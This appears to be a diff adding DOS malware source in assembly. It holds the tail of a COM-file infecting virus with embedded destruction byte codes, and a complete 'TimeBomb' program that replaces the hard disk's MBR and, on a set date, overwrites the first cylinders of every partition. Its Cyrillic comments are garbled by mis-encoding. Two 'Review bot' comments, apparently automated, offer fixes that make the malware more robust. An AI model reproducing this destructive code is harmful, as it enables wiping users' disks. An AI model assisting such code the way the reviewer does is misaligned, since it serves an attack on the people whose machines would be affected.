|
||||
;ÛÛ Close the File ÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
|
||||
MOV AH,3EH ;
|
||||
INT 21H ; Close the File
|
||||
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛ Set File Attribute back ÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
|
||||
|
||||
Set_FileAttributes_Back:
|
||||
MOV AX,4301H ;
|
||||
MOV CX,[SI+8] ; Get File Attribute
|
||||
MOV DX,26H ;
|
||||
ADD DX,SI ;
|
||||
INT 21H ; Set File Attribute
|
||||
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛ Restore Org DTA address ÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
|
||||
Restore_Org_DTA:
|
||||
PUSH DS
|
||||
MOV AH,1AH
|
||||
MOV DX,[SI] ; Get Original DTA
|
||||
MOV DS,[SI+2] ; address
|
||||
INT 21H ; St DTA to ds:dx
|
||||
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛ Put 3 Original 1st three bytes in place and execute original program ÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
|
||||
POP DS ; Restore DS
|
||||
PUSH SI ; Store SI
|
||||
CLD ;
|
||||
ADD SI,81H ; Address where the 1st three
|
||||
; bytes can be found.
|
||||
MOV DI,100H ; Destination Address
|
||||
MOV CX,3 ; Number of bytes to move
|
||||
REP MOVSB ; Move the bytes
|
||||
POP SI ; Restore SI
|
||||
POP CX ; Restore CX
|
||||
XOR AX,AX ; Zero register
|
||||
XOR BX,BX ; Zero register
|
||||
XOR DX,DX ; Zero register
|
||||
XOR SI,SI ; Zero register
|
||||
MOV DI,100H
|
||||
PUSH DI ; Store DI
|
||||
XOR DI,DI ; Zero register
|
||||
RET 0FFFFH ; Terminate Virus-Code and
|
||||
; execute original program.
|
||||
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛ Virus Data Area ÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
|
||||
|
||||
ORG_DTA_ADD: DW ? ; Storing place for BX of
|
||||
; original DTA
|
||||
DW ? ; Storing place for ES of
|
||||
; original DTA
|
||||
File_Time: DW ? ; Storing place for the
|
||||
; filetime of the file
|
||||
Date: DW ? ; Storing place for the
|
||||
; filedate
|
||||
Attrib: DW ? ; Storing place for the
|
||||
; file attributes.
|
||||
|
||||
Three_Bytes: DB 0E9h, 27h, 03h
|
||||
|
||||
First_New_Byte: DB 0E9h ; First new byte of the
|
||||
; the infected file. This is
|
||||
; the jump instruction.
|
||||
Length_Min_3: DB 0Dh, 27h ; Also new address to jump
|
||||
; to for the virus on exe-
|
||||
; cution, 2nd and 3rd new byte
|
||||
|
||||
Search_Spec: DB '*.COM',00h
|
||||
|
||||
Path_Add_Org: DW 00,05
|
||||
|
||||
Path_Add_Vir: DW '6M'
|
||||
|
||||
DB 'PATH=', 00, 00
|
||||
|
||||
Destruc_Code_1: DB 0B4h, 0h, 0CDh, 20h, 90h
|
||||
|
||||
File_Path: DB 'VIRCOM.COM' ; Filename including PATH
|
||||
DB 30 DUP(0)
|
||||
|
||||
New_DTA:
|
||||
DB 02
|
||||
DB '????????COM'
|
||||
DB 03, 11H
|
||||
DB 7 DUP (0)
|
||||
DB 20H, 80H, 12H, 17H, 15H, 10H
|
||||
DB 27H, 0, 0
|
||||
|
||||
FileName: DB 'VIRCOM.COM', 00h, 00h, 00h
|
||||
|
||||
Destruc_Code_2: DB 0F4H, 0F4H, 0F4H, 0F4H
|
||||
|
||||
Destruc_Code_3: DB 0CDH, 19H, 0CDH, 19H, 0E9H
|
||||
|
||||
First_3_Bytes: DB 0E9h, 45h, 45h
|
||||
|
||||
Notice: DB '(C) Monxla'
|
||||
|
||||
Time ENDP
|
||||
|
||||
SEG_A ENDS
|
||||
|
||||
|
||||
|
||||
END START
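Review bot: The annotation on the first AH=48h call is misleading: `MOV BX,0FFFFH ; graphs in memory. ???` describes it as allocating 4096 paragraphs, but BX=0FFFFh is the usual oversized request that makes the call fail and return the size of the largest free block in BX, which the following `CMP BX,5` and the second `MOV AH,48H ; Again allocate memory` call appear to rely on. I would replace the two comment halves with `; Request 0FFFFh paragraphs: fails on purpose and` / `; returns the largest free block size in BX`. The Destruction Scheme 2 banner also carries a sentence copied from Scheme 1 (`will terminate at once with returning to DOS.`) that does not describe the HLT/INT sequence it sits in and should be dropped. These are annotation fixes only; the disassembled bytes stay as they are.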
|
||||
|
|
@ -0,0 +1,472 @@
|
|||
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
|
||||
; (C) ANS (Armourer) TimeBomb Ver 1.00 25 Jun
|
||||
; FIDOnet 2:461/29.444 FreeWare, SourceWare 1995
|
||||
;
|
||||
;
|
||||
; <20>®«®áâìî § ¬¥ï¥â MBR. <20>® ¤®á⨦¥¨¨ ®¯à¥¤¥«¥®© ¤ âë ä â «ì® £à®å ¥â ¢¨â
|
||||
;
|
||||
; ‘â àë© MBR § ¯¨áë¢ ¥âáï ¢ ä ©« c:\mbr.bak, çâ®¡ë ¬®¦® ¡ë«® ¢®ááâ ®¢¨âì,
|
||||
; ¥á«¨ çâ®. “¯à ¢«¥¨ï áâ àë© MBR ¥ ¯®«ãç ¥â, â ª çâ® ¥á«¨ ® ¤¥« « çâ®-â®
|
||||
; ¡®«¥¥ 㬮¥, ¥¦¥«¨ § £à㧪 á¨á⥬ë á ªâ¨¢®£® à §¤¥« - TimeBomb ¯à¨¤¥âáï
|
||||
; ¯¥à¥¤¥« âì.
|
||||
;
|
||||
; <20>ਠáà ¡ âë¢ ¨¨ TimeBomb § â¨à îâáï ¯¥à¢ë¥ 4 樫¨¤à ª ¦¤®£® à §¤¥«
|
||||
; ¢¨â¥, ¢ª«îç ï «®£¨ç¥áª¨¥ ¤¨áª¨ DOS (extended partition)
|
||||
;
|
||||
; ‘«¥¤ã¥â § ¬¥â¨âì, çâ® Non-DOS à §¤¥«ë (HPFS, ¯à¨¬¥à) ¯à¨ í⮬ ¯®áâà ¤ îâ
|
||||
; ¥§ ç¨â¥«ì® - ¢ á¢ï§¨ á ª®à¥ë¬ ®â«¨ç¨¥¬ ¨å áâàãªâãàë ®â DOS FAT.
|
||||
;
|
||||
killed_cyl = 4 ; —¨á«® 㡨¢ ¥¬ëå 樫¨¤à®¢ ¢ ª ¦¤®¬ à §¤¥«¥
|
||||
xor_value = 73h ; ‡ 票¥ § è¨ä஢ ¨ï ‚ 襣® ¯®á«¥¤¥£® á«®¢ ;-)
|
||||
|
||||
locals
|
||||
cseg segment
|
||||
assume cs:cseg
|
||||
org 100h
|
||||
.286
|
||||
start proc near
|
||||
;
|
||||
; ˆáâ ««ïæ¨ï
|
||||
;
|
||||
; <20>஢¥à塞 ª®¬ ¤ãî áâபã
|
||||
mov si, 80h
|
||||
mov bl, byte ptr [si]
|
||||
xor bh, bh
|
||||
cmp bl, 8
|
||||
jnc @@checkdate
|
||||
|
||||
|
||||
help:
|
||||
; ‚ ª®¬ ¤®© áâப¥ ¥ 㪠§ ¤ â - ¢ë¢®¤¨¬ ¯®¤áª §ªã
|
||||
mov dx, offset @@title
|
||||
mov ah, 9
|
||||
int 21h
|
||||
int 20h
|
||||
|
||||
|
||||
; <20>®«ã票¥ BCD-ç¨á« ¨§ ª®¬. áâப¨
|
||||
getBCD proc near
|
||||
dec si
|
||||
mov ax, word ptr [si+bx] ; <20>¥à¥¬ ¯®á«¥¤¨¥ ¤¢¥ æ¨äàë
|
||||
sub ax, '00' ; ASCII -> BIN
|
||||
xchg al, ah
|
||||
db 0d5h, 10h ; AAD á ¬®¤¨ä¨ª â®à®¬ 16
|
||||
cmp al, 9ah
|
||||
jnc help
|
||||
dec si ; ‘à §ã ¯¥à¥å®¤¨¬ ª á«¥¤ãî饬㠯®«î
|
||||
dec si
|
||||
retn
|
||||
getBCD endp
|
||||
|
||||
|
||||
@@checkdate: ; <20>஢¥à塞 ¤ âã (á ç « £®¤, § ⥬ ¬¥áïæ, § ⥬ ç¨á«®)
|
||||
; ¨ ¯à¨¢®¤¨¬ ¥¥ ª 㦮¬ã ä®à¬ âã
|
||||
; Š®à४â®áâì ¤ âë ¥ ¯à®¢¥à塞 - ¦â® ¯à®¡«¥¬ ¯®«ì§®¢ ⥫ï -
|
||||
; çâ® ® â ¬ ¢¢¥«
|
||||
call getBCD ; <20>¥à¥¬ æ¨äàë £®¤
|
||||
mov byte ptr year, al ; <20>®«ã稫¨ BCD-year
|
||||
cmp byte ptr [bx+si+1], '.' ; <20>஢¥à塞 à §¤¥«¨â¥«ì
|
||||
jne help
|
||||
call getBCD ; <20>¥à¥¬ æ¨äàë ¬¥áïæ
|
||||
mov byte ptr month, al ; <20>®«ã稫¨ BCD-month
|
||||
cmp byte ptr [bx+si+1], '.' ; <20>஢¥à塞 à §¤¥«¨â¥«ì
|
||||
jne help
|
||||
call getBCD ; <20>¥à¥¬ æ¨äàë ¤ï
|
||||
mov byte ptr day, al ; <20>®«ã稫¨ BCD-day
|
||||
|
||||
|
||||
@@singledisk:
|
||||
;
|
||||
; ‡ ¬¥ï¥¬ MBR ¢¨â ᢮¨¬ ª®¤®¬ ¨§ bomb proc
|
||||
;
|
||||
; —¨â ¥¬ áâ àë© MBR, á®åà 塞 ¥£® ¢ c:\mbr.bak, ¯¨è¥¬ ᥡï
|
||||
;
|
||||
; —¨â ¥¬ MBR
|
||||
mov cx, 1
|
||||
mov dx, 80h
|
||||
mov ax, 201h
|
||||
mov bx, offset buffer
|
||||
int 13h
|
||||
jnc @@rd_ok
|
||||
|
||||
mov dx, offset @@rd_err
|
||||
|
||||
@@err_exit: ; ‚뢮¤ á®®¡é¥¨ï ¨§ DX ¨ ¢ë«¥â ¯® ®è¨¡ª¥
|
||||
mov ah, 9
|
||||
int 21h
|
||||
retn
|
||||
|
||||
@@rd_ok:
|
||||
; ‘®§¤ ¥¬ ä ©«
|
||||
mov dx, offset @@fname
|
||||
xor cx, cx
|
||||
mov ah, 3ch
|
||||
int 21h
|
||||
jnc @@cr_ok
|
||||
|
||||
mov dx, offset @@cr_err
|
||||
jmp @@err_exit
|
||||
|
||||
@@cr_ok:
|
||||
; <20>¨è¥¬ ¢ ä ©«
|
||||
mov bx, ax
|
||||
mov cx, 512
|
||||
mov dx, offset buffer
|
||||
mov ah, 40h
|
||||
int 21h
|
||||
jnc @@wr_ok
|
||||
|
||||
mov dx, offset @@wr_err
|
||||
jmp @@err_exit
|
||||
|
||||
@@wr_ok:
|
||||
; ‡ ªàë¢ ¥¬ ä ©«
|
||||
mov ah, 3eh
|
||||
int 21h
|
||||
|
||||
;
|
||||
; <20>¥à¥®á¨¬ ᢮© MBR ¬¥áâ® áâ ண®
|
||||
;
|
||||
mov si, offset bomb
|
||||
mov di, offset buffer
|
||||
mov bx, di
|
||||
mov cx, di
|
||||
sub cx, si
|
||||
cld
|
||||
rep movsb
|
||||
|
||||
;
|
||||
; ‡ ¯¨áë¢ ¥¬ ®¢ë© MBR ¯®¢¥àå áâ ண®
|
||||
;
|
||||
mov cx, 1
|
||||
mov dx, 80h
|
||||
mov ax, 301h
|
||||
int 13h
|
||||
|
||||
mov dx, offset @@mbr_wr_err
|
||||
jc @@err_exit
|
||||
|
||||
mov dx, offset @@done_msg
|
||||
jmp @@err_exit
|
||||
|
||||
|
||||
; ‘®®¡é¥¨ï ®¡ ®è¨¡ª å
|
||||
@@rd_err: db 'Error read the MBR of C:',13,10,'$'
|
||||
@@cr_err: db 'Error creating the '
|
||||
@@fname: db 'C:\MBR.BAK',0,'file',13,10,'$'
|
||||
@@wr_err: db 'Error writing backup file',13,10,'$'
|
||||
@@mbr_wr_err: db 'Error writing new MBR',13,10,'$'
|
||||
@@done_msg: db 'Your MBR replaced by TimeBomb',13,10,'$'
|
||||
|
||||
|
||||
; ‡ áâ ¢ª
|
||||
@@title:
|
||||
db 13,10,10
|
||||
db '(C) Armourer TimeBomb Ver 1.00 25 Jun 1995',13,10,10
|
||||
db ' Usage: timebomb <date>',13,10,10
|
||||
db ' Where <date> is a fatal date for your computer.',13,10
|
||||
db ' Date format must be in exUSSR standard: DD.MM.YY',13,10,10
|
||||
db 'Good Luck ;)',13,10,'$'
|
||||
|
||||
start endp
|
||||
|
||||
|
||||
|
||||
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
|
||||
; ’¥ªáâ ¡®¬¡ë. Š®¬¡¨¨àã¥âáï á MBR (®â MBR ¡¥à¥âáï ¯ àâ¨è)
|
||||
;
|
||||
; <20>â®â ª®¤ ¡ã¤¥â áâ à⮢ âì á ¤à¥á 0:7c00h
|
||||
;
|
||||
bomb proc near
|
||||
|
||||
; <20> áâà ¨¢ ¥¬ á⥪ ¨ ¯¥à¥®á¨¬ MBR, ªã¤ ¤® (0:600h)
|
||||
cli
|
||||
mov ax, cs
|
||||
mov ss, ax
|
||||
mov ds, ax
|
||||
mov es, ax
|
||||
mov si, 7c00h
|
||||
mov sp, si
|
||||
push si ; <20>⮠㦮 ¤«ï ¯®á«¥¤ãî饣® áâ àâ boot'
|
||||
cld
|
||||
mov cx, 1beh / 2 ; <20>®á«¥ â ª®£® ¯¥à¥®á SI ¡ã¤¥â 㪠§ë¢ âì
|
||||
mov di, 600h ; ¯ àâ¨è
|
||||
rep movsw
|
||||
|
||||
push ax ; ‘¥£¬¥â
|
||||
push offset beginbomb - offset bomb + 600h ; ‘¬¥é¥¨¥
|
||||
retf
|
||||
|
||||
|
||||
beginbomb:
|
||||
; <20>஢¥à塞 ¢à¥¬ï
|
||||
mov ah, 4
|
||||
int 1ah ; <20>à®ç«¨ ¤ âã ¢ CX:DX
|
||||
jc @@skipbomb ; …᫨ ç áë ¥ à ¡®â îâ -> ¯à®¯ã᪠¥¬ ¯à®¢¥àªã
|
||||
|
||||
year = $ + 2
|
||||
cmp cl, 12h ; <20>஢¥à塞 £®¤
|
||||
jc @@skipbomb ; ƒ®¤ ¥ ᮢ¯ « ;)
|
||||
jne @@explode ; …᫨ íâ®â £®¤ ¯à®è¥« - ¢§àë¢ ¥¬áï ¬¥¤«¥®
|
||||
|
||||
month = $ + 3
|
||||
day = $ + 2
|
||||
cmp dx, 1234h ; ˆ¬¥® â ª, çâ®¡ë ¥ ᣥ¥à¨à®¢ «áï
|
||||
; ª®à®âª¨© ¢ ਠ⠤«ï CMP
|
||||
jc @@skipbomb ; <20>¥ ᮢ¯ « ¤¥ì ¨ ¬¥áïæ
|
||||
|
||||
|
||||
@@explode:
|
||||
;
|
||||
; ‚ᥠᮢ¯ «®, ¯à¨è« ç¥à ï ¯®à ...
|
||||
;
|
||||
; ‘â¨à ¥¬ ¯¥à¢ë¥ 樫¨¤àë ª ¦¤®£® à §¤¥« (¢ª«îç ï «®£¨ç¥áª¨¥
|
||||
; ¤¨áª¨ DOS)
|
||||
;
|
||||
; “áâ ¢«¨¢ ¥¬ ¢ ª®¤¥ ¡®¬¡ë ¯ à ¬¥âàë ¢¨â
|
||||
mov dl, 80h
|
||||
call destroy
|
||||
|
||||
; “áâ ¢«¨¢ ¥¬ ¯ à ¬¥âàë â®à®£® ¢¨â , ¥á«¨ ® ¥áâì
|
||||
ror dl, 1 ; …᫨ ®¤¨ ¤¨áª, ä« £ CF ¡ã¤¥â ãáâ ®¢«¥
|
||||
jc @@singledisk
|
||||
|
||||
mov dl, 81h
|
||||
call destroy
|
||||
|
||||
@@singledisk:
|
||||
jmp @@incorrect ; ‚뢮¤¨¬ á®®¡é¥¨¥ "Missing operating ssytem"
|
||||
|
||||
|
||||
@@skipbomb:
|
||||
;
|
||||
; Žâà ¡®âª ®à¬ «ì®£® ª®¤ MBR
|
||||
;
|
||||
; ˆé¥¬ § £à㧮çë© à §¤¥«
|
||||
mov cl, 4 ; …áâì ¢á¥£® 4 ¢ ਠâ ...
|
||||
|
||||
@@searchboot: ; –¨ª« ¯®¨áª
|
||||
mov dx, word ptr [si] ; ‘à §ã § £à㦠¥¬ ¢ DX â®, ç⮠㦮
|
||||
cmp dl, 80h ; <20>â®â à §¤¥« § £à㧮çë© ?
|
||||
je @@boot
|
||||
|
||||
add si, 10h ; <20>¥à¥å®¤¨¬ ª á«¥¤ãî饩 § ¯¨á¨
|
||||
loop @@searchboot
|
||||
|
||||
; <20>¥ 諨 - ¢ë¤ ¥¬ á®®¡é¥¨¥
|
||||
@@incorrect:
|
||||
call errmsg
|
||||
db 'Missing operating system',0
|
||||
|
||||
|
||||
@@boot: ; ‡ £à㦠¥¬ boot-ᥪâ®à ¨ ¯¥à¥¤ ¥¬ ¥¬ã ã¯à ¢«¥¨¥
|
||||
mov cx, word ptr [si+2] ; —â® ¤® - ¢ CX
|
||||
mov ax, 201h ; —¨â ¥¬ 1 ᥪâ®à
|
||||
pop bx ; <20>® ¤à¥áã 0:7c00h
|
||||
push bx
|
||||
int 13h
|
||||
jnc @@exit
|
||||
|
||||
call errmsg
|
||||
db 'Error reading operating system',0
|
||||
|
||||
@@exit:
|
||||
cmp word ptr [bx + 510], 0aa55h
|
||||
jne @@incorrect
|
||||
retn ; ‡ ¯ã᪠¥¬ boot
|
||||
|
||||
;
|
||||
; <09>®¤¯à®£à ¬¬ë
|
||||
;
|
||||
|
||||
; ‚ë¤ ç á®®¡é¥¨ï ®¡ ®è¨¡ª¥
|
||||
errmsg proc near
|
||||
sti
|
||||
cld
|
||||
pop si
|
||||
mov ah, 0eh
|
||||
@@nextchar:
|
||||
lodsb
|
||||
or al, al
|
||||
je $
|
||||
int 10h
|
||||
jmp @@nextchar
|
||||
errmsg endp
|
||||
|
||||
|
||||
; Ž¡å®¤ ¢á¥å à §¤¥«®¢ ¤¨áª á § ¯¨áìî ¨å ¯ à ¬¥â஢ ¢ ¡ãä¥à
|
||||
getpart proc near
|
||||
; <20>⮠४ãàᨢ ï äãªæ¨ï.
|
||||
; <20> ¢å®¤¥ ¢ SI âॡã¥âáï 㪠§ â¥«ì ®ç¥à¥¤®© à §¤¥«
|
||||
; ‚ ¡ãä¥à ¯® ¤à¥áã ES:DI ¯¨èãâáï ¯ à ¬¥âàë ⥪.à §¤¥«
|
||||
|
||||
mov cx, 4 ; ‘ç¥â稪 à §¤¥«®¢ ¢ ª ¦¤®¬ MBR
|
||||
|
||||
@@nextpart:
|
||||
; <20>஢¥à塞 ⨯ à §¤¥«
|
||||
cmp byte ptr [si+4], 0 ; <20>¥¨á¯®«ì§ã¥¬ë© à §¤¥«
|
||||
je @@exit
|
||||
|
||||
; <20>¨è¥¬ ¢ ¡ãä¥à ¯ à ¬¥âàë à §¤¥«
|
||||
mov ax, word ptr [si] ; ƒ®«®¢
|
||||
stosw
|
||||
mov dx, ax ; ƒ®â®¢¨¬áï ª® ¢å®¤ã ¢ ४ãàá¨î
|
||||
|
||||
disk1 = $ + 1
|
||||
mov dl, 80h ; <20>®¬¥à ®¡à ¡ âë¢ ¥¬®£® ¤¨áª
|
||||
|
||||
mov ax, word ptr [si+2]
|
||||
stosw ; –¨«¨¤à/ᥪâ®à
|
||||
|
||||
; ‘®¢ ¯à®¢¥à塞 ⨯ à §¤¥« - ¥ à áè¨à¥ë© «¨ ® ?
|
||||
cmp byte ptr [si+4], 5
|
||||
jne @@exit ; <20>¥â - ¨¤¥¬ ¤ «ìè¥
|
||||
|
||||
; <20>ëà塞 ¢ ४ãàá¨î
|
||||
; —¨â ¥¬ MBR à áè¨à¥®£® à §¤¥«
|
||||
push cx ; ‘®åà 塞 áç¥â稪
|
||||
push si ; ‘®åà 塞 㪠§ ⥫ì à §¤¥«ë
|
||||
add bx, 512 ; <20>த¢¨£ ¥¬ 㪠§ â¥«ì ¡ãä¥à
|
||||
mov cx, ax ; ‘¥©ç á CX:DX 㪠§ë¢ îâ MBR
|
||||
mov ax, 201h ; à áè¨à¥®£® à §¤¥«
|
||||
int 13h ; —¨â ¥¬ à áè¨à¥ë© à §¤¥« ¢ 0:BX
|
||||
jnc @@rec ; <20>஢¥àª ª®à४â®áâì
|
||||
|
||||
; ‚ë室¨¬ ¨§ ४ãàᨨ ¢ á«ãç ¥ á¡®ï
|
||||
pop si
|
||||
pop cx
|
||||
sub bx, 512
|
||||
jmp @@exit
|
||||
|
||||
@@rec:
|
||||
mov si, bx ; “áâ ¢«¨¢ ¥¬ 㪠§ ⥫ì
|
||||
add si, 1beh ; â ¡«¨æã à §¤¥«®¢
|
||||
call getpart
|
||||
|
||||
|
||||
@@exit:
|
||||
add si, 10h
|
||||
loop @@nextpart
|
||||
|
||||
; ‚ë室 ¨§ ४ãàᨨ
|
||||
sub bx, 512
|
||||
pop dx
|
||||
pop si
|
||||
pop cx
|
||||
push dx
|
||||
retn
|
||||
|
||||
getpart endp
|
||||
|
||||
|
||||
; “¨ç⮦¥¨¥ ᮤ¥à¦¨¬®£® ⥪ã饣® ¤¨áª
|
||||
destroy proc near
|
||||
|
||||
; <20>®«ãç ¥¬ ¯ à ¬¥âàë ¢¨â , 㪠§ ®£® ¢ DL
|
||||
mov byte ptr ds:[offset disk - offset bomb + 600h], dl
|
||||
mov byte ptr ds:[offset disk1 - offset bomb + 600h], dl
|
||||
mov ah, 8
|
||||
int 13h
|
||||
mov byte ptr ds:[heads - offset bomb + 600h], dh
|
||||
and cl, 63
|
||||
mov byte ptr ds:[sectors - offset bomb + 600h], cl
|
||||
push dx
|
||||
|
||||
mov bx, 0a00h ; <20>ãä¥à ¤«ï ç⥨ï MBR à áè¨à¥ëå à §¤¥«®¢
|
||||
; <20>® 室㠤¥« ª BX ¡ã¤¥â ¯à¨¡ ¢«ïâìáï ¯® 512 -
|
||||
; â ª çâ® ¬ ªá¨¬ «ìë© ã஢¥ì ¢«®¦¥®áâ¨
|
||||
; á®áâ ¢¨â 57 à §¤¥«®¢
|
||||
mov di, 500h ; <20>ãä¥à ¯®¤ ¯ à ¬¥âàë ¤«ï int 13h (64 ¤¨áª )
|
||||
|
||||
; <20>¥ªãàᨢ® ®¡å®¤¨¬ «®£¨ç¥áª¨¥ ¤¨áª¨, § ¯¨áë¢ ï ¢ ¡ãä¥à ¯ à ¬¥âàë
|
||||
; ¤«ï int 13h
|
||||
push si ; Š®à४âë© ¢å®¤ ¢ ४ãàá¨î
|
||||
push cx
|
||||
|
||||
xor ax, ax ; “áâ ®¢ª ¤«ï áâ¨à ¨ï £« ¢®£® MBR
|
||||
stosw
|
||||
inc ax
|
||||
stosw
|
||||
|
||||
call getpart ; Ž¡å®¤ à §¤¥«®¢
|
||||
|
||||
|
||||
; ‘®§¤ ¥¬ § 票¥ ¯à®¯¨áë¢ ¨ï
|
||||
; ‘¥©ç á ¢ bx «¥¦¨â ¤«¨ ¯à®¯¨áë¢ ¥¬ëå ¤ ëå ¢ ¯ à £à ä å - 800h
|
||||
push di ; ‘®åà 塞 㪠§ ⥫ì 墮áâ ᯨ᪠¯ à ¬¥â஢
|
||||
mov di, bx ; ‚ DI ¡ã¤¥â 㪠§ â¥«ì ¡ãä¥à ¤«ï ¤ ëå
|
||||
shl di, 4 ; <20>ãä¥à ¡ã¤¥â à ᯮ« £ âìáï ᮠᬥ饨ï 8000h
|
||||
push di ; ‘®åà 塞 ¤à¥á ¡ãä¥à § ¯®«¥¨ï
|
||||
|
||||
@@nextword:
|
||||
mov si, offset lmd - offset bomb + 600h
|
||||
mov cx, 16
|
||||
@@nextchar:
|
||||
lodsb
|
||||
xor al, xor_value
|
||||
stosb
|
||||
loop @@nextchar
|
||||
dec bx
|
||||
jne @@nextword
|
||||
|
||||
|
||||
; ˆ¤¥¬ § ¤ ¯® ¡ãä¥àã
|
||||
pop bx ; ‚®ááâ ¢«¨¢ ¥¬ ¤à¥á ¡ãä¥à
|
||||
pop si ; ‚®ááâ ¢«¨¢ ¥¬ 㪠§ â¥«ì ¯ à ¬¥âàë
|
||||
mov cx, si ; ‚ëç¨á«ï¥¬ ç¨á«® § â¨à ¥¬ëå à §¤¥«®¢
|
||||
sub cx, 500h
|
||||
shr cx, 2
|
||||
|
||||
std
|
||||
lodsw ; <20>¥à¥å®¤¨¬ ª ¯®á«¥¤¥© § ¯¨á¨ ¢ ¡ãä¥à¥
|
||||
|
||||
|
||||
@@nextpart:
|
||||
push cx ; ‘®åà 塞 áç¥â稪
|
||||
|
||||
lodsw ; <20>¥à¥¬ ¯ à ¬¥âàë à §¤¥«
|
||||
mov cx, ax ; –¨«¨¤à/ᥪâ®à
|
||||
lodsw
|
||||
mov dx, ax ; ƒ®«®¢
|
||||
|
||||
disk = $ + 1
|
||||
mov dl, 80h ; <20>®¬¥à § â¨à ¥¬®£® ¤¨áª
|
||||
|
||||
mov si, killed_cyl ; ‘ç¥â稪 㡨¢ ¥¬ëå 樫¨¤à®¢
|
||||
|
||||
; <20>ய¨áë¢ ¥¬ à §¤¥«
|
||||
@@nexthead:
|
||||
sectors = $ + 1
|
||||
mov ax, 310h ; !!!!
|
||||
int 13h
|
||||
inc dh ; ‘«¥¤ãîé ï £®«®¢
|
||||
|
||||
heads = $ + 2
|
||||
cmp dh, 16 ; ‚¥áì 樫¨¤à ?
|
||||
jne @@nexthead
|
||||
|
||||
add cx, 64 ; ‘«¥¤ãî騩 樫¨¤à
|
||||
xor dh, dh ; <20> ç¨ ¥¬ á ã«¥¢®© £®«®¢ë
|
||||
dec si
|
||||
jne @@nexthead
|
||||
|
||||
pop cx ; ‚®ááâ ¢«¨¢ ¥¬ áç¥â稪
|
||||
loop @@nextpart ; ¨ ªàã⨬ 横« ¯® à §¤¥« ¬
|
||||
|
||||
pop dx
|
||||
retn
|
||||
destroy endp
|
||||
|
||||
|
||||
lmd:
|
||||
irpc ch, <LAMERS MUST DIE.>
|
||||
db '&ch' xor xor_value
|
||||
endm
|
||||
|
||||
bomb endp
|
||||
|
||||
|
||||
buffer: ; ‘î¤ ¡ã¤¥¬ ç¨â âì áâ àë© mbr
|
||||
dw offset buffer - offset bomb
|
||||
cseg ends
|
||||
end start
|
|
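Review bot: Nothing bounds the copy at `mov cx, di` / `sub cx, si` / `rep movsb` that overlays `bomb` onto `buffer` before the buffer is written back as the new MBR with `mov ax, 301h`: if `offset buffer - offset bomb` ever exceeds 1BEh (446) the copy runs into the partition table and the 0AA55h signature that the bomb's own `@@searchboot` loop and the `cmp word ptr [bx + 510], 0aa55h` check depend on, and the installer would still print `@@done_msg`. I could not confirm from the listing alone that the bomb currently fits, so an assemble-time guard would make the invariant explicit, e.g. `.erre (offset buffer - offset bomb) le 1beh ; bomb must not overrun the partition table at 1BEh` placed right after `buffer:`. The `int 13h` write at `mov ax, 301h` is also checked only for CF, so a comment saying the written MBR is never read back for verification would help a reader.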
@ -0,0 +1,19 @@
|
|||
ÉÍËÍËÍËÍËÍËÍËÍËÍ»
|
||||
ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ͹ Just another stuff from
|
||||
